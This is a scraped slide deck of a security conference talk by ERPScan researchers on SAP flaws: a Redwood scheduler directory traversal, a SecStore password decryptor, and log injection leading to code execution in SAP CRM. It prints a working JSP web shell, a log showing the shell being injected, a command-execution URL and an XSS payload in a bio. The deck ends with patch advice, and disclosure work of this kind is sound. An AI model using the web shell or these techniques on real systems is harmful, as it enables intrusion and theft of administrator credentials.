t h e p h a n t o m s e c u r i t y · 2019-09-10 · young padawan security researcher at erpscan....

105
THE PHANTOM SECURITY By Vahagn Vardanyan and Vladimir Egorov

Upload: others

Post on 02-Apr-2020

0 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

T H E P H A N T O M S E C U R I T Y

By Vahagn Vardanyan and Vladimir Egorov

Page 2: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Master jedy Senior security researcher at ERPScan.

Bug hunter, malware and vulnerability researcher for over 5+ years

System of a Down FAN!!!

Vahagn Vardanyan

Page 3: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Young padawan security researcher at ERPScan.

Business application security, reverse engineering, and encryption

»><svg\onload=alert(”HELLO”)>

Vladimir Egorov

LET THE HATE FLOW THROUGH YOU

Page 4: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 5: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Introduction

SAP NetWeaver

Redwood

Revenge of the Logs

A New Hope

Page 6: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Introduction

• What is SAP?

• Vulnerability statistics

• The newest CVE

• Structure reminding

Page 7: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SAP NetWeaver

• What is NetWeaver?

• How to deploy apps?

Page 8: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Redwood

• Where I can find it?

• How to get access?

• A vulnerability

• DEMO

Page 9: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Revenge of

the Logs

• What is SAP CRM?

• How does it look?

• RCE via log injection

• DEMO

Page 10: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

A New Hope

• Vulnerable systems

in the WILD

• PATCH info

Page 11: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Episode I

SAP NetWeaver

Page 12: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

A short time ago in a galaxy very, very close ...

Page 13: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

COMPANY

Page 14: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SAP notes By Year

Page 15: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

CVE-2017-6950Location: SAP GUI

Type: RCE

CVE-2017-7717 Location: SAP NetWeaver

Type: SQL to RCE

CVE-2017-9844 Location: SAP NetWeaver

Type: Java deserialization

CVE-2017-11459 Location: SAP TREX

Type: RCE

Page 16: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

How to get admin privileges in SAP?

Page 17: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 18: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 19: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 20: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Episode I

SAP NetWeaver

Page 21: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 22: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

http://host:port/ webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat / Chat#

CVE-2016-3973Location: SAP NetWeaver AS Java WD_CHAT

Type: Information Disclosure vulnerability

Page 23: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

http://host:port/ webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat / Chat#

CVE-2016-3973Location: SAP NetWeaver AS Java WD_CHAT

Type: Information Disclosure vulnerability

webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat

Page 24: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

http://host:port/ webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat / Chat#

Page 25: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 26: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 27: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 28: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 29: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 30: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 31: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 32: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 33: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 34: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 35: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

The bug here feel Iyoung padawan

Page 36: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 37: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

https://host:port/scheduler/ui/js/ffffffffbac53543/UIUtilJavaScriptJS?javascript/old/utils.js

C:/usr/sap/<SID>J00/j2ee/cluster/apps/redwood.com/scheduler-ear/servlet_jsp/scheduler/root/black/javascript/old/utils.js

Path on filesystem:

Url:

Page 38: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

https://host:port/scheduler/ui?

Page 39: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

https://host:port/scheduler/ui?

Page 40: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

https://host:port/scheduler/ui?

Page 41: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

https://host:port/scheduler/ui?

Page 42: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

https://host:port/scheduler/ui?

Page 43: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

https://host:port/scheduler/ui?

Windows win.ini

Page 44: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 45: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

JUST REPORT IT

Page 46: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 47: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

DEMO TIME

Page 48: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore in SAP is like the Death Star's thermal exhaust port:

A little weakness in the center of a fortified system

Page 49: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore.properties

Page 50: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore.propertiesSecStore.key

Page 51: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore.propertiesSecStore.key

Administrator credentials

Database credentials

Page 52: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore Decryptor

Page 53: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore.key

SecStore Decryptor

Page 54: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore.key

Hardcoded key

SecStore Decryptor

Page 55: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore.key

Hardcoded key The real key

SecStore Decryptor

Page 56: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore.key

Hardcoded key The real key

SecStore.properties

SecStore Decryptor

Page 57: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore.key

Hardcoded key The real key

SecStore.properties

AdminPassword

3DES(CBC)

SecStore Decryptor

Page 58: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SecStore.key

Hardcoded key The real key

SecStore.properties

AdminPassword

3DES(CBC)

SecStore Decryptor

PBEWithSHAAnd3KeyTripleDESCBC

Page 59: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

DEMO TIME

Page 60: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

https://github.com/erpscanteam

Page 61: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 62: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 63: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 64: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 65: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 66: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

What do we have now?

Page 67: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

I. Anon directory traversal in scheduler by Redwood

Findings

Page 68: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

I. Anon directory traversal in scheduler by Redwood

II. Decryption tool to get administrator password

Findings

Page 69: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

I. Anon directory traversal in scheduler by Redwood

II. Decryption tool to get administrator password

III. ???

Findings

Page 70: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 71: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Customer Relationship Management

"Was ist das ???"

Page 72: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

• Emails, telephones, chats, marketing materials, socialmedia..

• Analysing target audiences• Kind of collaboration

Customer Relationship Management

Page 73: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 74: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Log configuration...

Page 75: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 76: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 77: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SAP SYSTEM

Page 78: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

SAP AS JAVA

Page 79: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Applications

SAP AS JAVA

Page 80: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Applications

SAP AS JAVA

Page 81: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Applications

SAP AS JAVA

Page 82: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Applications

SAP AS JAVA

Page 83: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Logs

Applications

SAP AS JAVA

Page 84: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Logs

Applications

Before...

SAP AS JAVA

Page 85: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Logs

Applications

SAP AS JAVA

SAP AS JAVA

Before...

After...

Page 86: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Logs

Applications

SAP AS JAVA

Applications

SAP AS JAVA

Before...

After...

Page 87: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Logs

Applications

SAP AS JAVA

Database

Applications

SAP AS JAVA

Before...

After...

Page 88: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Logs

Applications

SAP AS JAVA

Database

Applications

SAP AS JAVA

Before...

After...

Page 89: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Logs

Applications

SAP AS JAVA

Database

Applications

SAP AS JAVA

Before...

After...

Page 90: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Logs

Applications

SAP AS JAVA

Database

Applications

SAP AS JAVA

Logs

Before...

After...

Page 91: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Logs

Applications

SAP AS JAVA

Database

Applications

SAP AS JAVA

Logs

Before...

After...

Page 92: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Database

Logs

Applications

SAP AS JAVA

Database

Applications

SAP AS JAVA

Logs

Before...

After...

Page 93: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

DEMO TIME

Page 94: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

Before After

Log file extension: *.log, *.xml or *.trc Log file extension: *.jsp

Access via browser: DENIED Access via browser: GRANTED

Path on file system:C:\usr\sap\DM0\J00\j2ee\cluster\server0\log\

Path on file system:C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp

URL: https://host:port/shell.jspURL: None

Page 95: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

<%@ page import="java.util.*,java.io.*"%><%if (request.getParameter("cmd") != null){

Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in);String disr = dis.readLine(); out.println ("<PRE>");while ( disr != null ){

out.println(disr);disr = dis.readLine();

}out.println ("</PRE>");

} %>

Page 96: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 97: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 98: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

...

#2.0#2018 02 11 13:21:01:332#0-800#Debug#com.sap.isa.user.action.LoginBaseAction#

#CRM-ISA-

BBS#sap.com/crm~b2b#C000AC100A410073000004A90000110C#2213550000000004#s

ap.com/crm~b2b#com.sap.isa.user.action.LoginBaseAction#Guest#0##74C4C72B0F7111

E8B17500000021C6AE#c1229d500d1811e8a25b00000021c6ae#c1229d500d1811e8a25

b00000021c6ae#0#Thread[HTTP Worker

[@2035997437],5,Dedicated_Application_Thread]#Plain##request.parameter.["]<%@

page import="java.util.*,java.io.*"%><% if request.getParameter("cmd") !=

null){Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream();

DataInputStream dis = new DataInputStream(in); String disr = dis.readLine();

out.println("<PRE>"); while ( disr != null ) {out.println(disr);disr

=dis.readLine();}out.println("</PRE>");} %>["]="" #

#2.0#2018 02 11 13:21:01:332#0-800#Debug#com.sap.isa.user.action.LoginBaseAction#

...

Page 99: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

https://host:port/shell.jsp?cmd=ipconfig

Page 100: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

DEMO TIME

Page 101: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 102: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>
Page 103: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

78 United States42 India38 Chile28 Germany25 Brazil23 Australia19 France13 Singapore

12 Turkey

12 Taiwan

11 Spain

11 Republic of Korea

11 Colombia

10 Italy

9 Russian Federation

***

Almost 500 public SAP servers are Vulnerable

Page 104: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

PATCH

• Update CRM (2547431)

• Upgrade to Redwood 9

• Install SAP note 2486657(exploited in the wild)

Page 105: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>

THANK YOU

USA:228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301Phone 650.798.5255

EU:

Luna ArenA 238 Herikerbergweg, 1101 CM AmsterdamPhone +31 20 8932892

EU:Štětkova 1638/18, Prague 4 - Nusle,

140 00, Czech Republic

[email protected]

Read our blogerpscan.com/category/press-center/blog/

Join our webinarserpscan.com/category/press-center/events/

Subscribe to our newsletterseepurl.com/bef7h1

10

5